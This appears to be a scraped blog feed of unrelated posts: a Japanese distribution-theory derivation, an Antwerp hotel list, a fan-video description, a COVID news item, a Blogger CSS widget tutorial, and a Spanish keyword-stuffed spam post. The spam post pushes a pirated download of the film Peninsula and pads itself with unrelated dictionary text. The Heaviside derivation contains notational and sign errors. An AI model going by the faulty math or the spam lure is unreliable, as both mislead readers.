最後にこのことを用いて、ベビサイドの階段関数 $$ H(x):= \begin{cases} 1, & x>0\\newline 0, & x\le0 \end{cases}, $$ を超関数の意味で微分してみましょう。 $$ \langle H, \phi\rangle = \langle H, \phi'\rangle = - \int_\infty^\infty H(x)\phi'(x)dx \\ = - \int_0^\infty \phi'(x)dx = -[\phi(x)]^\infty_0 = \phi(0) = \langle \delta, \phi\rangle $$ よって、 $H'(x) = \delta$ が得られました。
参考書類
本記事の内容のほとんどはこちらの書籍をもとに書かれました。

これならわかる工学部で学ぶ数学
posted with amazlet at 17.10.15
千葉 逸人 プレアデス出版 売り上げランキング: 95,334
Amazon.co.jpで詳細を見る
こちらの書籍には、超関数の収束などを含む、より厳密な証明が書かれています。

システムと制御の数学 (システム制御情報ライブラリー)
posted with amazlet at 17.10.15
山本 裕 朝倉書店 売り上げランキング: 882,232
Amazon.co.jpで詳細を見る
1 note
·
View note
Photo

Discover the fascinating sights of Belgium’s so-called “capital of cool” — Antwerp. As one of Europe’s largest port cities, you’ll be captivated by its architectural gems and its vibrant fashion and art scene. For instance, you can shop designer and vintage pieces to your heart’s content, or spot beautifully preserved guild houses in the Historic City Centre.so much to do in this city! Luckily, there are also plenty of options for travelers looking to visit this lively, cultural hub.
So whether you’re looking for a fun, youth hostel, or an upscale suite, you are sure to find something in this handy list of Antwerp’s finest hotels for places to stay.
Activities to do around Antwerp?
Check out my this comprehensive ‘Top Things to do in Antwerp‘ travel guide!
.title-bar:after, .title-bar:before, .title-bar:after, .title-bar:before, h2{ border-color: }
Best Hotels in Antwerp
» Best Budget Hotels in Antwerp «
+ The ASH
» See the BEST price deal & read reviews at Agoda, Booking.com or HostelWorld » You can also check HotelsCombined to compare rates
Enjoy the modern design inspired by Japanese capsule hotels. Best of all, it’s only 5 minutes away from attractions like Meir and the famous Centraal Station.
What to love: The student-friendly facilities Address: Italiëlei 237 -239, Antwerp Center 2000 Closest landmark: Metro Astrid Price starts from: $20~ + YUST Antwerp » See the BEST price deal & read reviews at Booking.com or HostelWorld » You can also check HotelsCombined to compare rates
Stay in a spacious room with nature-inspired design and lots of natural light. Curl up with an book at the library or climb up the terrace for the best view of the city.
What to love: The chic interiors Address: Coveliersstraat 2, Berchem, 2018 Closest landmark: deSingel Antwerp Price starts from: $21~
+ Antwerp City Hostel » See the BEST price deal & read reviews at Agoda, Booking.com or HostelWorld » You can also check HotelsCombined to compare rates
Set in a Baroque guild house dating back to the 12th century, guests can stay at a mixed dorm with a shared bathroom. Enjoy complimentary Wi-Fi, a shared kitchen, and even free breakfast.
What to love: The lovely cathedral view Address: Grote Markt 40, Antwerp Center, 2000 Closest landmark: Grote Markt Price starts from: $21~
+ Antwerp Backpackers Hostel » See the BEST price deal & read reviews at Agoda, Booking.com or HostelWorld » You can also check HotelsCombined to compare rates
Meet fellow travelers in this buzzing youth hostel. Enjoy a fully equipped kitchen, which includes an array of herbs and oils. Jam out with a guitar, play board games, or have a barbecue during happy hour at the on-site bar.
What to love: The fun, youthful vibe Address: Kattenberg 110, Borgerhout, 2140 Closest landmark: EcoHuis Antwerp Price starts from: $22~ + Kabas Hostel » See the BEST price deal & read reviews at Agoda, Booking.com or HostelWorld » You can also check HotelsCombined to compare rates
It’s situated right in Antwerp Center so you have access to several museums, and cafes. Select from a mixed dorm or double room, complete with comfy beds.
What to love: The cozy atmosphere Address: Lange Lozanastraat 133, Antwerp Center, 2018 Closest landmark: Synagogue Shomre Hadass Price starts from: $23~ » Best Mid-Range Hotels in Antwerp «
+ Crowne Plaza Antwerpen » See the BEST price deal & read reviews at Agoda or Booking.com » You can also check HotelsCombined to compare rates
Experience cozy and stylish rooms at this boutique-style hotel surrounded by parks. Take it easy and swim in the indoor infinity pool, or relax in the sauna and steam bath. Indulge in Flemish cuisine and regional specialties at the hotel restaurant.
What to love: The sleek infinity pool Address: 10, Gerard Le Grellelaan, Antwerp Center, 2020 Closest landmark: deSingel Antwerp Price starts from: $89~
+ Van der Valk Hotel Antwerpen » See the BEST price deal & read reviews at Agoda or Booking.com » You can also check HotelsCombined to compare rates
Find this 4-star hotel tucked away in the low-key Borgerhout district, just off Antwerp Ring Road. Visit the in-house restaurant and savour a delicious meal while sitting on the terrace, or take a dip in the swimming pool.
What to love: The quiet surroundings Address: Luitenant Lippenslaan 66, Borgerhout, 2140 Closest landmark: EcoHuis Antwerp Price starts from: $95~
+ Hotel Indigo Antwerp City Centre » See the BEST price deal & read reviews at Agoda or Booking.com » You can also check HotelsCombined to compare rates
Guests will love this boutique hotel’s Scandinavian design aesthetic, with its soft hues and trendy oak decor. Lounge in style with luxury cosmetics, soundproofed rooms, free Wi-Fi, and your very own Nespresso machine.
What to love: The sophisticated decor Address: Koningin Astridplein 43, Antwerp Center, 2018 Closest landmark: Metro Astrid Price starts from: $113~
+ Hampton by Hilton Antwerp Centraal Station » See the BEST price deal & read reviews at Agoda or Booking.com » You can also check HotelsCombined to compare rates
Experience luxury living at Hotel Hampton by Hilton, located right next to the Central Station. Check out the sleek and clean design, with bright accent furniture and walls.
What to love: The convenient location Address: Pelikaanstraat 10-16 , Antwerp Center, 2018 Closest landmark: Antwerp Central Station Price starts from: $114~
+ Radisson Blu Astrid Hotel » See the BEST price deal & read reviews at Agoda or Booking.com » You can also check HotelsCombined to compare rates
Explore the Diamond Area when you’re staying at this 4-star business hotel. De-stress at the Health Club, which features a fully equipped fitness center, a cool indoor pool, and a massage and spa treatment area. The hotel is also right across Antwerp Central Station.
What to love: The numerous spa options Address: Koningin Astrid Plein 7, Antwerp Center, 2018 Closest landmark: Metro Astrid Price starts from: $127~ » Best Luxury Hotels in Antwerp «
+ Hotel Le Tissu » See the BEST price deal & read reviews at Agoda or Booking.com » You can also check HotelsCombined to compare rates
Savor mornings on the terrace, a walled garden, and views of the park at this unassuming B&B. Guests will love the lavish rooms adorned with designer fabrics and wooden accents.
What to love: The splendid decor Address: Brialmontlei 2, Antwerp Center, 2018 Closest landmark: Metro Plantin Price starts from: $138~
+ Hilton Antwerp Old Town » See the BEST price deal & read reviews at Agoda or Booking.com » You can also check HotelsCombined to compare rates
Unwind at the luxurious Hilton Antwerp Old Town, which is situated right on the Groenplaaats Square. Guests will love the modern design of the room, which includes a marble-fitted bathroom and even a private rooftop terrace for executive suites.
What to love: The central location Address: Groenplaats 32, Antwerp Center, 2000 Antwerp Closest landmark: Grand Bazar Shopping Center Price starts from: $142~
+ U Eat & Sleep Antwerp » See the BEST price deal & read reviews at Agoda or Booking.com » You can also check HotelsCombined to compare rates
Choose among 3 luxury rooms at this cheekily-named 4-star hotel. The hotel is a combined effort of an award-winning chef and TV personality. Don’t miss hanging out by the terrace, which features tranquil views of the water.
What to love: The riverside view Address: Nassaustraat 42, Antwerp Center, 2000 Closest landmark: MAS Museum Antwerp Price starts from: $176~
+ Hotel Julien » See the BEST price deal & read reviews at Agoda or Booking.com » You can also check HotelsCombined to compare rates
Stay in an upscale luxury hotel set in a 16th century property. Admire the hotel’s minimalist design and contemporary furnishing. Don’t miss the incredible view from your rooftop terrace!
What to love: The relaxing vibe Address: Korte Nieuwstraat 24, Antwerp Center, 2000 Closest landmark: Saint Charles Borromeo Church Price starts from: $185~
+ Hotel De Witte Lelie Antwerp » See the BEST price deal & read reviews at Agoda or Booking.com » You can also check HotelsCombined to compare rates
Live like royalty at this small boutique hotel right in Antwerp Center. Delight in the lush, modern furnishings and vibrant printed walls of the 17th century building.
What to love: The extravagant design Address: Keizerstraat 16-18, Antwerp Center, 2000 Closest landmark: Rockox House Price starts from: $340~ .title-bar:after, .title-bar:before, .title-bar:after, .title-bar:before, h2{ border-color: }
Overall
Make the most of your stay in charming Antwerp and take your pick among these top accommodations. I hope you find something that will suit your needs on your trip to the diamond capital of the world!
How about you?
What do you think of these Antwerp hotels for places to stay?
Which would you like to stay in?
Or have you stayed with any of these hotels in Antwerp before? How was it?
Did you like this article? Follow me on Facebook, Twitter, Instagram, or YouTube and be notified about my newest posts and updates!
The post The Best Hotels in Antwerp, Belgium: Cheap to Luxury Picks appeared first on I am Aileen.
#><em>#DDD;#ededed;#>.</span>#ed2665;#ffffff;#><strong><span#99cc00;#>#ffffff;><span#ededed;>.</span></p>#bxtitle_1636502000.box-title.box-title-line-middle#bxtitle_1636502000.box-title.box-title-line-around#ed2665#99cc00;>.</span></p>#99cc00;><strong><span
0 notes
Video
youtube
Pacific Rim / Evangelion: 2.0 You Can (Not) Advance - Fate
Published on Apr 28, 2017
Pacific Rim (film) https://en.wikipedia.org/wiki/Pacific...) Pacific Rim IMDB http://www.imdb.com/title/tt1663662/ Pacific Rim: Uprising (film) https://en.wikipedia.org/wiki/Pacific... Pacific Rim: Uprising IMDB http://www.imdb.com/title/tt2557478/ Evangelion: 2.0 You Can (Not) Advance (animated film) https://en.wikipedia.org/wiki/Evangel... Evangelion: 2.0 You Can (Not) Advance IMDB http://www.imdb.com/title/tt0860906/ Evangelion: 2.0 You Can (Not) Advance (soundtrack) https://en.wikipedia.org/wiki/Music_o... --- Pacific Rim is a 2013 American science fiction monster film directed by Guillermo del Toro, and starring Charlie Hunnam, Idris Elba, Rinko Kikuchi, Charlie Day, Burn Gorman, Robert Kazinsky, Max Martini, and Ron Perlman. The screenplay is by Travis Beacham and del Toro, with a story by Beacham. The film is set in the future, when Earth is at war with the Kaiju, colossal monsters which have emerged from an interdimensional portal on the bottom of the Pacific Ocean. To combat the monsters, humanity unites to create the Jaegers, gigantic humanoid mechas each controlled by at least two pilots, whose minds are joined by a neural bridge. Focusing on the war's later days, the story follows Raleigh Becket, a washed-up Jaeger pilot called out of retirement and teamed with rookie pilot Mako Mori as part of a last-ditch effort to defeat the Kaiju. Principal photography began on November 14, 2011, in Toronto and lasted through April 2012. The film was produced by Legendary Pictures and distributed by Warner Bros.. It was released on July 12, 2013, including in 3D and IMAX 3D, receiving generally positive reviews; the visual effects, action sequences and the nostalgic style were highly praised. While it underperformed at the box office in the United States, it was highly successful in other markets. It earned a worldwide total of more than $411 million—$114 million in China alone, its largest market—becoming Del Toro's most commercially successful film to date. A sequel titled Pacific Rim: Uprising, directed by Steven S. DeKnight and produced by Del Toro, and with Kikuchi, Day, and Gorman reprising their roles, is scheduled for release on February 23, 2018. --- Pacific Rim: Uprising is an upcoming American science fiction monster film directed by Steven S. DeKnight and written by DeKnight, Emily Carmichael, Kira Snyder, and T.S. Nowlin from a story by Guillermo del Toro. It is the sequel to the 2013 film Pacific Rim. The film stars John Boyega, Scott Eastwood, Cailee Spaeny and Jing Tian, with Rinko Kikuchi, Charlie Day, and Burn Gorman returning in their roles from the original film. It is scheduled to be released on February 23, 2018, by Universal Pictures. --- Evangelion: 2.0 You Can (Not) Advance. (ヱヴァンゲリヲン新劇場版: 破 Evangerion Shin Gekijōban: Ha?, lit. "Evangelion: The New Movie: Break") is a 2009 Japanese animated film directed by Kazuya Tsurumaki and Masayuki, and written by Hideaki Anno. It is the second of four films released in the Rebuild of Evangelion tetralogy based on the original anime series Neon Genesis Evangelion. It was produced and co-distributed by Hideaki Anno's Studio Khara in partnership with Gainax. The film continues the story of Evangelion: 1.0 You Are (Not) Alone, with Shinji Ikari continuing his role as a pilot of one of the gigantic "Evangelion" mecha as part of NERV's ongoing fight against the mysterious creatures known as Angels. While replicating many scenes and plot elements from the original series, the film also introduces new ones, including newly designed creatures and new characters, such as Mari Illustrious Makinami, and integrates newly available 3D CG technology. Its ending paves the way for the significant storyline departures from the original series in Evangelion: 3.0 You Can (Not) Redo. --- This video was inspired by the Pacific Rim film and the Evangelion 2.0 You Can (not) Advance epic song 'Fate' . Enjoy ! --- Kaos Sverige http://kaossverige.se/ http://kaos-sverige.tumblr.com/
3 notes
·
View notes
Text
PelisPLUS~ Peninsula Pelicula Completa en Español Latino 2020
PelisPLUS~ Peninsula Pelicula Completa en Español Latino 2020
Ver~ Peninsula Pelicula Completa Latino ☆HD☆2020,Ver~ Peninsula Pelicula Completa en Español Latino 2020,Ver~ Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Ver~ Peninsula 2020 Pelicula Completa latino HD 1080p,

"
A soldier and his team battle hordes of post-apocalyptic zombies in the wastelands of the Korean Peninsula bioskopin21.xyz.
Peninsula 2020
Fechas de estreno: 2020-07-15 Género: Action, Horror, Thriller Duración: 114 Minutes Company : Next Entertainment World, RedPeter Film Reparto: Kang Dong-won, Lee Jung-hyun, Lee Re, Kwon Hae-hyo, Kim Min-jae, Koo Kyo-hwan, Kim Do-yoon, Lee Ye-won, Kim Gyu-baek, Jang So-yeon
HD Descargar ►► haga clic aquí
REVISIÓN:
¿Qué es Pensum » Su Definición y Significado 2020 ~ El pensum es el plan de estudio de una carrera que da a conocer las materias o asignaturas que se estudiarán en cada período de la misma Éste está meticulosamente preparado por los docentes o profesionales del curso con la finalidad de que el estudiante perciba todos los conocimientos necesarios para iniciar su vida profesional una vez culminada su vida estudiantil
pénsum Definición Diccionario de la lengua española ~ Del lat pensum tarea obligación cf ingl pensum y fr pensum tarea escolar 1
pensun o pénsum Fundéu ~ Se trata de una forma de referirse al ‘plan de estudios’ En español debe tildarse pénsum y formar el plural como pensa caso excepcional recogido en la Gramática académica Con respecto al origen procede del latín pensum participio del verbo pendere Este verbo tiene numerosas acepciones y entre ellas está ‘examinar evaluar’
Pensum Definition of Pensum by MerriamWebster ~ History and Etymology for pensum New Latin from Latin duty charge something weighed out from neuter of pensus past participle of pendere to weigh estimate pay Learn More about pensum Dictionary Entries near pensum
Home Pontificia Universidad Javeriana ~ Perfil del egresado El profesional egresado de la carrera de Arquitectura de la Pontificia Universidad Javeriana está formado para liderar la transformación y organización del espacio físico adecuándolo a las necesidades humanas gerenciar los procesos a lo largo de su ejecución y brindar al país soluciones integrales acordes con sus características socioculturales y ambientales para
Pensum Escuela Dominical Nacional Ipuc escueladominicals ~ Pensum Escuela Dominical Nacional Ipuc Aviso legal Política de privacidad Política de cookies Mapa del sitio Inicia sesión Salir Editar Jimdo Esta página web ha sido creada con Jimdo ¡Regístrate ahora gratis en om
Pensum Universidad Autónoma de Santo Domingo ~ Ofertas Academicas Detalles Categoría Información General La Universidad Autónoma de Santo Domingo es una institución que une a profesoresas estudiantes y trabajadores administrativos de apoyo a la labor académica con el propósito de dar cumplimiento a la misión universitaria orientada hacia la búsqueda de la verdad la proyección del porvenir de la sociedad dominicana y el
Pensum Universidad Autónoma de Santo Domingo ~ Pensum Ingeniería Lacteoalimentaria Sobre la Carrera Pensum Tecnología en procesos lácteos alimentarios Pensum Sobre la Carrera Docentes Personal Administrativo Horarios y Contactos Centro de Adiestramiento Lechero CAL Veterinaria Sobre la Escuela Carreras Lic en Medicina Veterinaria Sobre la Carrera Pensum
Programas académicos – ITM ~ Campus Robledo Calle 73 No 76A 354 Vía al Volador Tel 574 440 51 00 Fax 574 440 51 02 Campus Fraternidad Calle 54A No 30 01 Barrio Boston
Universidad Dominicana OM ~ Tels 809 5337733 809 5332648 Fax 809 5350048 Email email protected Universidad Dominicana OM Ave Independencia 200 Rep Dom Ir a Contacto
Streaming en línea Peninsula (2020) búsqueda relacionada
Peninsula 2020 Pelicula Completa Online, Descargar Peninsula 2020 Pelicula Completa Torrent, Ver HD Peninsula 2020, Descargar Peninsula Pelicula Completa en Espanol Latino, Peninsula Pelicula Completa en Linea Subtitulado, Peninsula Pelicula Completa Espanol, Watch Peninsula (2020) Online Free, Download Peninsula (2020) Soundtrack, Watch Peninsula (2020) Online Dailymotion, Download Peninsula (2020) Subtitle, Watch Peninsula (2020) Online Best Quality, Watch Peninsula (2020) Free Good Quality,Ver~ Peninsula 【2020】 Pelicula Online HD En Español,Ver~ Peninsula - 2020 En Español Latino HD 1080p},Ver~ Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Cuevana~HD Peninsula Pelicula Completa Latino ☆HD☆2020,Cuevana~HD Peninsula Pelicula Completa en Español Latino 2020,Cuevana~HD Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Cuevana~HD Peninsula 2020 Pelicula Completa latino HD 1080p,Cuevana~HD Peninsula 【2020】 Pelicula Online HD En Español,Cuevana~HD Peninsula - 2020 En Español Latino HD 1080p},Cuevana~HD Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Descargar Peninsula Pelicula Completa Latino ☆HD☆2020,Descargar Peninsula Pelicula Completa en Español Latino 2020,Descargar Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Descargar Peninsula 2020 Pelicula Completa latino HD 1080p,Descargar Peninsula 【2020】 Pelicula Online HD En Español,Descargar Peninsula - 2020 En Español Latino HD 1080p},Descargar Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Ver (online) Peninsula Pelicula Completa Latino ☆HD☆2020,Ver (online) Peninsula Pelicula Completa en Español Latino 2020,Ver (online) Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Ver (online) Peninsula 2020 Pelicula Completa latino HD 1080p,Ver (online) Peninsula 【2020】 Pelicula Online HD En Español,Ver (online) Peninsula - 2020 En Español Latino HD 1080p},Ver (online) Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Mega~HD Peninsula Pelicula Completa Latino ☆HD☆2020,Mega~HD Peninsula Pelicula Completa en Español Latino 2020,Mega~HD Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Mega~HD Peninsula 2020 Pelicula Completa latino HD 1080p,Mega~HD Peninsula 【2020】 Pelicula Online HD En Español,Mega~HD Peninsula - 2020 En Español Latino HD 1080p},Mega~HD Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,MegaTorrent Peninsula Pelicula Completa Latino ☆HD☆2020,MegaTorrent Peninsula Pelicula Completa en Español Latino 2020,MegaTorrent Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,MegaTorrent Peninsula 2020 Pelicula Completa latino HD 1080p,MegaTorrent Peninsula 【2020】 Pelicula Online HD En Español,MegaTorrent Peninsula - 2020 En Español Latino HD 1080p},MegaTorrent Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,uTorrent Peninsula Pelicula Completa Latino ☆HD☆2020,uTorrent Peninsula Pelicula Completa en Español Latino 2020,uTorrent Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,uTorrent Peninsula 2020 Pelicula Completa latino HD 1080p,uTorrent Peninsula 【2020】 Pelicula Online HD En Español,uTorrent Peninsula - 2020 En Español Latino HD 1080p},uTorrent Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,[ VER]] Peninsula Pelicula Completa Latino ☆HD☆2020,[ VER]] Peninsula Pelicula Completa en Español Latino 2020,[ VER]] Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,[ VER]] Peninsula 2020 Pelicula Completa latino HD 1080p,[ VER]] Peninsula 【2020】 Pelicula Online HD En Español,[ VER]] Peninsula - 2020 En Español Latino HD 1080p},[ VER]] Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,PelisPLUS~ Peninsula Pelicula Completa Latino ☆HD☆2020,PelisPLUS~ Peninsula Pelicula Completa en Español Latino 2020,PelisPLUS~ Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,PelisPLUS~ Peninsula 2020 Pelicula Completa latino HD 1080p,PelisPLUS~ Peninsula 【2020】 Pelicula Online HD En Español,PelisPLUS~ Peninsula - 2020 En Español Latino HD 1080p},PelisPLUS~ Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Mirapelis~ Peninsula Pelicula Completa Latino ☆HD☆2020,Mirapelis~ Peninsula Pelicula Completa en Español Latino 2020,Mirapelis~ Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Mirapelis~ Peninsula 2020 Pelicula Completa latino HD 1080p,Mirapelis~ Peninsula 【2020】 Pelicula Online HD En Español,Mirapelis~ Peninsula - 2020 En Español Latino HD 1080p},Mirapelis~ Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado, Peninsula Pelicula Completa Latino ☆HD☆2020, Peninsula Pelicula Completa en Español Latino 2020, Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆, Peninsula 2020 Pelicula Completa latino HD 1080p, Peninsula 【2020】 Pelicula Online HD En Español, Peninsula - 2020 En Español Latino HD 1080p}, Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado, Watch Peninsula (2020) Online Free Yesmovies, Watch Peninsula (2020) Reddit 123movies, Watch Peninsula (2020) Blu Ray Online Free, Download Peninsula (2020) Leaked Full Movie, Download Peninsula (2020) English Version, Watch Peninsula (2020) Good Quality, Watch Peninsula (2020) Download Free, Watch Peninsula (2020)
0 notes
Text
Corona Havoc continues in Kashmir, 15 die 540 positive in a day
Corona Havoc continues in Kashmir, 15 die 540 positive in a day
Jammu div follows with 114 infected, JK UT tally 31371
Northlines Correspondent
Srinagar, Aug 21: Jammu and Kashmir on Friday reported 653 fresh cases of COVID-19 pandemic including 49 travelers taking the total number of positive cases in the Union Territory to 31,371. Of the total 31,371 positive cases, 24,495 are from Kashmir and 6,876 from Jammu Division. 15 people have died from COVID…
View On WordPress
0 notes
Quote
Hello readers!! Adding a social counter widget in blogger is very important thing and it is one of the most useful widget which you should install for your readers to make them feel comfortable and know more about your blogs popularity. In some situations the blog post which is long enough or having more number comments looks good and gives an impression of a popular blog and to show off that popularity you need and sleek looking social counter widget, you really need this kind of function, so that the visitor can easily check your blog page’s popularity and become your fan, subscriber or follower.Now lets get back to our widget, hence this is a small widget, we have created a small and tiny widget with simple codes but at the same time it gives your blog an elegant touch. The widget looks very cute and smooth. You can check the demo below before adding the widget. .item .post-body ul li:beforedisplay:none;.item .widget .post-body li margin: 0;.trendy_counters width: 350px;.trendy_counters:after clear: both;content: ”;display: block;.trendy_counters ul list-style: none;margin: 0;padding: 0;clear: both;.trendy_counters ul li text-align: center;background: #f9f9f9;.trendy_counters ul li a padding: 10px;text-decoration:none;.trendy-counters-per-row-2 ul li width: 50%;float: left;.trendy-counters-per-row-3 ul li width: 33.333%;float: left;.trendy-counters-per-row-4 ul li width: 25%;float: left;.sc_vertical a, .sc_vertical span:not(.fa) display: block;text-align: center.sc_horizontal a display: flex;text-align: center;align-items: center;justify-content: center;.sc_horizontal span margin-right: 3px;.show-labels-No .label display: none !important;.trendy-counters-icons-order padding: 10px;background: #f6f6f6;.trendy-counters-icons-order div background: #eaeaea;display: inline-block;margin-right: 5px;padding: 10px;.trendy-counters-icons-order div:hover cursor: move;.trendy_counters ul li text-align: center;background: #f9f9f9;width: 33%;float: left;padding: 0; Adding The Widget The First thing you need to do is to login into your Blogger account and go to >> Layout >> Click add a gadget any where into your layout >> Add HTML/JAVASCRIPT widget and paste the below code in the blank space. 114followers 0followers 0likes 0followers 0subscribers 266followers .trendy_counters:after clear: both;content: ”;display: block;.trendy_counters ul list-style: none;margin: 0;padding: 0;clear: both;.trendy_counters ul li text-align: center;background: #f9f9f9;.trendy_counters ul li a padding: 10px;text-decoration:none;.trendy-counters-per-row-2 ul li width: 50%;float: left;.trendy-counters-per-row-3 ul li width: 33.333%;float: left;.trendy-counters-per-row-4 ul li width: 25%;float: left;.sc_vertical a, .sc_vertical span:not(.fa) display: block;text-align: center.sc_horizontal a display: flex;text-align: center;align-items: center;justify-content: center;.sc_horizontal span margin-right: 3px;.show-labels-No .label display: none !important;.trendy-counters-icons-order padding: 10px;background: #f6f6f6;.trendy-counters-icons-order div background: #eaeaea;display: inline-block;margin-right: 5px;padding: 10px;.trendy-counters-icons-order div:hover cursor: move;.trendy_counters ul li text-align: center;background: #f9f9f9;width: 33%;float: left;padding: 0;Change the highlighted red text with your subscriber/followers/fan number. and if you already have fontawesome in your blog then remove blue highlighted code. ConclusionCongrats !! You have made it. now you have learned that How to Add Sleek Social Counter Widget In Blogger. Visit your blog and check the awesome widget live in action, hope you liked this tutorial, if you enjoyed then please share it with your friends, we are working hard to develop more such awesome widgets please stay tuned with Us.
http://www.globalone.com.np/2019/11/how-to-add-sleek-social-counter-widget.html
0 notes